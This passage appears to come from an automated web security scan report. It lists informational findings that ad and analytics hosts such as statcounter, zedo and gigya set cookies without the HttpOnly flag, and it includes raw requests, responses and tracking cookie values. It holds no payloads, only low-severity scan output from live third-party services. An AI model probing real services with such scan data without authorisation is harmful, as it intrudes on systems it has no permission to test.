GET /t.php?sc_project=594085&resolution=1920&h=1200&camefrom=http%3A//drupal.org/cases&u=http%3A//www.popsugar.com/community/welcome&t=Welcome&java=1&security=defbf778&sc_random=0.8725620578043163&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831680.0; expires=Sat, 10-Sep-2016 12:48:00 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

5.15. http://c13.statcounter.com/t.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c13.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=1345764&resolution=1920&h=1200&camefrom=http%3A//drupal.org/cases&u=http%3A//www.nowpublic.com/&t=NowPublic.com%20%7C%20The%20News%20is%20NowPublic&java=1&security=26324a10&sc_random=0.533788861008361 HTTP/1.1
Host: c13.statcounter.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831677.0

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831677.0-1345764.1315831702.0; expires=Sat, 10-Sep-2016 12:48:22 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

5.16. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFSkp=305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=305,7038,15:826,622,9:1545,8,9:305,7040,15;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24;expires=Wed, 12 Oct 2011 12:48:31 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=153
Expires: Mon, 12 Sep 2011 12:51:04 GMT
Date: Mon, 12 Sep 2011 12:48:31 GMT
Content-Length: 7450
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='';var zz
...[SNIP]...

5.17. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=8&a=0&f=&n=1545&r=13&d=14&q=&$=&s=2&z=0.5840262724086642 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24; FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0; PI=h484782Za669088Zc826000622,826000622Zs403Zt1255Zm768Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:3944d'$1545:1a0a560b687152eaa6ee3ef9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,622,14:1545,8,14:826,622,9:1545,8,9:1545,8,0:0,8,9:1545,0,9:305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:29:27:1:1:1:1:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2470020B826,110235,110236|1,1#0,24:0,1#0,24;expires=Wed, 12 Oct 2011 12:48:53 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=165
Expires: Mon, 12 Sep 2011 12:51:38 GMT
Date: Mon, 12 Sep 2011 12:48:53 GMT
Content-Length: 4602
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='1a0a560b687
...[SNIP]...

5.18. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7040/7039/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=1638&z=0.628017297713086 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFcat=305,7038,15; FFad=0; PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 507
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7040,15:305,7038,15:305,7038,0:0,7038,15:305,0,15:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:29:1:1:1:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7040,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=146
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:37 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1638;var zzPat='1a0a56
...[SNIP]...

5.19. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 407
Content-Type: application/x-javascript
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=305,7038,15:305,0,15:826,622,9:1545,8,9:305,7040,15;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=5:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=152
Expires: Mon, 12 Sep 2011 12:51:04 GMT
Date: Mon, 12 Sep 2011 12:48:32 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='';var zz
...[SNIP]...

5.20. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=8&a=0&f=&n=1545&r=13&d=9&q=&$=&s=2&z=0.3701211323495954 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=3:3:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFMCap=2470080B826,110235|0,1#0,24;expires=Wed, 12 Oct 2011 13:03:56 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:1:3:3:1:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=157
Expires: Mon, 12 Sep 2011 13:06:33 GMT
Date: Mon, 12 Sep 2011 13:03:56 GMT
Content-Length: 4557
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCust
...[SNIP]...

5.21. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.9584475292358547 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=2:2:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 420
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:5406e';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:2:1:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=85
Expires: Mon, 12 Sep 2011 13:05:03 GMT
Date: Mon, 12 Sep 2011 13:03:38 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='5406e''
...[SNIP]...

5.22. http://c7.zedo.com/utils/ecSet.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h1201513Za1013066Zc305007038%2C305007038Zs608Zt1255Zm768Zb43199&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFcat=305,7038,15; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199;expires=Wed, 12 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6687
Date: Mon, 12 Sep 2011 12:48:33 GMT
Connection: close



5.23. http://cm.npc-morris.overture.com/js_1_0/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-morris.overture.com
Path:   /js_1_0/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.css&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547 HTTP/1.1
Host: cm.npc-morris.overture.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyMjSyNnCxMAY6dMoAw=

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:41 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyNHF0dXZ2cAN%2bpN%2bAw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Thu, 09-Sep-2021 12:48:41 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4627


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...

5.24. http://counters.gigya.com/wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://counters.gigya.com
Path:   /wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif HTTP/1.1
Host: counters.gigya.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ucid=RFq8Ln1vPSaBPMmq4LEJ0w==; _mkto_trk=id:672-YBF-078&token:_mch-gigya.com-1314893715569-60156; __utma=246645010.642220752.1314893716.1314893716.1314893716.1; __utmz=246645010.1314893716.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 12:48:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web204
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: close
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: GF_1640683793=http://www.observer.com/; path=/
Set-Cookie: GF_1640683793=http://www.observer.com/; domain=gigya.com; path=/
Set-Cookie: GP_12447412969121244741302209=1640683793; path=/
Set-Cookie: GP_12447412969121244741302209=1640683793; domain=gigya.com; path=/
Set-Cookie: UUID=816512b5f435493ea41e36fb7f1fa2e6; expires=Sun, 12-Sep-2021 12:48:08 GMT; path=/
Set-Cookie: UUID=816512b5f435493ea41e36fb7f1fa2e6; domain=gigya.com; expires=Sun, 12-Sep-2021 12:48:08 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

5.25. http://d.adroll.com/check/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7/W6PQDSP73NHORGHG2INGBI

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /check/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7/W6PQDSP73NHORGHG2INGBI

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

